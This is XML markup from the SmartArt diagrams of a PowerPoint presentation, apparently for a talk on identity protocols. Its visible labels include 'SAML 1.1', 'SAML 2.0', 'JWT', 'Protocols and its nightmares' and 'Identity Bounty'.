    <dgm:cxn modelId="{732CCE1F-4E83-40E8-B7B7-B016BDAB4432}" type="presParOf" srcId="{707A78A9-7121-4E3B-AA51-461A5AD8B33B}" destId="{792F66F8-49DF-49C4-A2C8-AC432EDDED3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A4D026-7E7A-4C3D-B0A6-713401C65A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885476-4BDE-429D-89AD-0E3995FA48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300" dirty="0"/>
            <a:t>Token Type</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F91C5276-1D5F-4C4B-BFBD-4104845F0A1E}" type="parTrans" cxnId="{8873FDFB-B023-4F7A-B4FF-42CA509E0CBB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCD135B6-5570-4014-9AA7-02CF24FBFE1A}" type="sibTrans" cxnId="{8873FDFB-B023-4F7A-B4FF-42CA509E0CBB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFAFC8CE-8B34-482A-91D5-2C6E46B53058}" type="pres">
      <dgm:prSet presAssocID="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8889AEC-BBF4-4FF2-9BB9-EE865365BBBE}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA4856}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{652F0D11-7983-4AAB-B50C-9BBF419824BB}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA4856}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="FFC000"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{D7981DA8-1874-46F1-90EF-7BF6AB340F08}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA485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8A302975-5FF8-4849-9166-4D659259107A}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA4856}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{614900A7-0133-4D15-9DEE-1B8B65FE6D24}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA485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725D5B93-A42E-41BE-A3E3-03597AA7A945}" type="presOf" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{DFAFC8CE-8B34-482A-91D5-2C6E46B53058}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{87C25696-369F-4E2A-8CD5-221A03E84F34}" type="presOf" srcId="{E7885476-4BDE-429D-89AD-0E3995FA4856}" destId="{614900A7-0133-4D15-9DEE-1B8B65FE6D24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{8873FDFB-B023-4F7A-B4FF-42CA509E0CBB}" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{E7885476-4BDE-429D-89AD-0E3995FA4856}" srcOrd="0" destOrd="0" parTransId="{F91C5276-1D5F-4C4B-BFBD-4104845F0A1E}" sibTransId="{DCD135B6-5570-4014-9AA7-02CF24FBFE1A}"/>
    <dgm:cxn modelId="{34426434-655F-4A88-B8D6-B94B84044393}" type="presParOf" srcId="{DFAFC8CE-8B34-482A-91D5-2C6E46B53058}" destId="{A8889AEC-BBF4-4FF2-9BB9-EE865365BBBE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{34848B60-D52C-4E29-9C12-A83630B13BB9}" type="presParOf" srcId="{A8889AEC-BBF4-4FF2-9BB9-EE865365BBBE}" destId="{652F0D11-7983-4AAB-B50C-9BBF419824BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{BA023353-D379-43C3-BFDF-C73A6941A555}" type="presParOf" srcId="{A8889AEC-BBF4-4FF2-9BB9-EE865365BBBE}" destId="{D7981DA8-1874-46F1-90EF-7BF6AB340F08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{64F392DC-00BC-4F3E-A409-F47E0F530625}" type="presParOf" srcId="{A8889AEC-BBF4-4FF2-9BB9-EE865365BBBE}" destId="{8A302975-5FF8-4849-9166-4D659259107A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D00E27D2-0E06-4106-A158-BA814C0A5CF9}" type="presParOf" srcId="{A8889AEC-BBF4-4FF2-9BB9-EE865365BBBE}" destId="{614900A7-0133-4D15-9DEE-1B8B65FE6D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CF31DA-4F8E-4158-BD57-980AD0B295D1}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList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E0A022E-F501-4D6A-B7F8-EEC24211088A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" u="none" dirty="0"/>
            <a:t>SAML 1.1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05447DF4-13E6-41CA-8376-111805CF6B1B}" type="parTrans" cxnId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{067A5571-4130-4BA7-B061-824B4495CC44}" type="sibTrans" cxnId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" u="none" dirty="0"/>
            <a:t>SAML 2.0</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77FFDF12-22E2-4221-BBB5-60CD46104CD8}" type="parTrans" cxnId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{867069EF-CB44-4707-913B-47915FE8DA7D}" type="sibTrans" cxnId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF28327A-6ACE-4196-8AE3-021E145010A4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>JWT</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{054304F5-792B-43C1-9A1C-CD3738E01A37}" type="parTrans" cxnId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331B79E0-CCDC-4F80-9E64-196A1C9A1FB7}" type="sibTrans" cxnId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6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25321BBC-B1E0-4975-9E57-7EAEA0443B9E}" type="parTrans" cxnId="{971AC016-D3A7-4010-8325-DCF389BBC536}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90921925-DADC-4A00-850A-5F66AC68047A}" type="sibTrans" cxnId="{971AC016-D3A7-4010-8325-DCF389BBC536}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7EC2769-A2BA-4F11-875A-D1A7149F2AC2}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{280FC3BE-935D-4F5F-896B-F73344EF1531}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C48355B-3174-46B3-A1F1-80C3E7BCDBD9}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B69DCF54-2D9D-4535-9929-670416E84C0E}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0097499-02B0-4D57-BAD1-CC21EF7072FC}" type="pres">
      <dgm:prSet presAssocID="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" presName="text_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{707A78A9-7121-4E3B-AA51-461A5AD8B33B}" type="pres">
      <dgm:prSet presAssocID="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" presName="accent_4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{792F66F8-49DF-49C4-A2C8-AC432EDDED38}" type="pres">
      <dgm:prSet presAssocID="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{971AC016-D3A7-4010-8325-DCF389BBC536}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" srcOrd="3" destOrd="0" parTransId="{25321BBC-B1E0-4975-9E57-7EAEA0443B9E}" sibTransId="{90921925-DADC-4A00-850A-5F66AC68047A}"/>
    <dgm:cxn modelId="{9CF97C38-B07A-4C5A-A319-37B425DB70B6}" type="presOf" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{24646A5D-3F16-4058-85FD-A63CE0A7C22E}" type="presOf" srcId="{067A5571-4130-4BA7-B061-824B4495CC44}" destId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{CF28327A-6ACE-4196-8AE3-021E145010A4}" srcOrd="2" destOrd="0" parTransId="{054304F5-792B-43C1-9A1C-CD3738E01A37}" sibTransId="{331B79E0-CCDC-4F80-9E64-196A1C9A1FB7}"/>
    <dgm:cxn modelId="{D01F2288-571C-4EF7-BFDD-E2F0F92E2EEC}" type="presOf" srcId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" destId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" srcOrd="0" destOrd="0" parTransId="{05447DF4-13E6-41CA-8376-111805CF6B1B}" sibTransId="{067A5571-4130-4BA7-B061-824B4495CC44}"/>
    <dgm:cxn modelId="{28A482A6-D408-4069-983D-8A983C7F57C3}" type="presOf" srcId="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" destId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" srcOrd="1" destOrd="0" parTransId="{77FFDF12-22E2-4221-BBB5-60CD46104CD8}" sibTransId="{867069EF-CB44-4707-913B-47915FE8DA7D}"/>
    <dgm:cxn modelId="{D0830EE8-98C6-4A60-9B47-17875144EB0C}" type="presOf" srcId="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" destId="{F0097499-02B0-4D57-BAD1-CC21EF7072FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{F806EAF7-5978-4880-9BAA-41090E2C7E41}" type="presOf" srcId="{CF28327A-6ACE-4196-8AE3-021E145010A4}" destId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{72702396-5385-40FC-91C5-A487FBF98250}" type="presParOf" srcId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" destId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{23D55643-6371-4111-8CF4-4ECFCEDA808E}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{B614338A-5084-4451-A503-6F455F7A9B74}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{E7EC2769-A2BA-4F11-875A-D1A7149F2AC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D4F5CF71-CB11-48A1-80A0-76B18A100BFF}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0E3DA828-5645-4C13-9DCC-5276C71D8FF2}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{280FC3BE-935D-4F5F-896B-F73344EF1531}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{57A1CDEF-8415-41B5-BEA6-75BFA2C71DEB}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{3C48355B-3174-46B3-A1F1-80C3E7BCDBD9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C2AA89A6-0E8A-4D54-96FB-D13CCA071972}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3A36EEE5-8BDE-4158-AF91-62384C2961DC}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{99464564-B6A2-42F2-BC03-417FD03C66D8}" type="presParOf" srcId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" destId="{B69DCF54-2D9D-4535-9929-670416E84C0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{81D96A7A-D414-4356-B381-DE0DE36F76AA}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{239F5A54-79A0-4C87-937C-EE42B2964555}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{879BAB2F-62F9-4BA8-8B27-AFABE3985895}" type="presParOf" srcId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" destId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D54398CB-C00F-4D72-8FC3-0AD694EE4200}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9C2EAF49-E321-4C5D-BD97-174DA3180A0C}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3052718C-AF61-4EB7-87EF-3C94A0EC137C}" type="presParOf" srcId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" destId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9FCCB9F5-5963-42CD-95D9-22825B374B57}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{F0097499-02B0-4D57-BAD1-CC21EF7072FC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{A17FD5DF-85B1-4AFB-B5D0-E8C67C801871}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{707A78A9-7121-4E3B-AA51-461A5AD8B33B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{732CCE1F-4E83-40E8-B7B7-B016BDAB4432}" type="presParOf" srcId="{707A78A9-7121-4E3B-AA51-461A5AD8B33B}" destId="{792F66F8-49DF-49C4-A2C8-AC432EDDED3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47E08-D4F4-4C59-BFA9-51E626E17FF3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1693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38543-3606-471F-977E-0F98875809C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="259677" y="194842"/>
          <a:ext cx="472141" cy="472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C7943-1184-4A6F-9D12-FDB22E88D4B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="991497" y="1693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What’s identity?</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="991497" y="1693"/>
        <a:ext cx="9524102" cy="858439"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{51821A23-267C-41B0-AEB8-2907FECBFAA1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1074742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5036E-B599-4156-8E6F-ACE434DA8EDB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="259677" y="1267891"/>
          <a:ext cx="472141" cy="472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019A4-9F48-41AD-9E8A-CD461E10DD2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="991497" y="1074742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Protocols and its nightmares</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="991497" y="1074742"/>
        <a:ext cx="9524102" cy="858439"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C454DA6-554D-41CF-9917-811D5F7D8BDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2147791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5C2D2-0E04-4A6C-81BC-DE74B5F824CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="259677" y="2340940"/>
          <a:ext cx="472141" cy="4721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1A3E7-9CF0-4B4E-9201-93EEA4AA9A1F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="991497" y="2147791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Identity Bounty</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="991497" y="2147791"/>
        <a:ext cx="9524102" cy="858439"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{140A1319-E726-405F-B117-729E454CAFE4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3220840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4BD4-6FF9-4515-9C90-CD870C323301}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
